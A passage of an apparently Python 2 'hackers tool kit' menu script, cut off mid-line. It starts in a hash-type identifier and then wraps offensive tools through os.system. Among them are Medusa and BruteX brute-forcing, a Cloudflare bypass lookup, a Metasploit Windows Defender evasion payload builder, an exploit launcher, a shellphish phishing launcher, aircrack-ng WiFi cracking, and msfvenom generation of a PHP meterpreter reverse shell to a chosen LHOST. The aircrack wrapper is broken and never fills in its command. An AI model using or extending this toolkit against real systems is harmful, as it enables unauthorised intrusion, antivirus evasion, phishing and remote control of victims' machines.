hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + #msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php# + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = 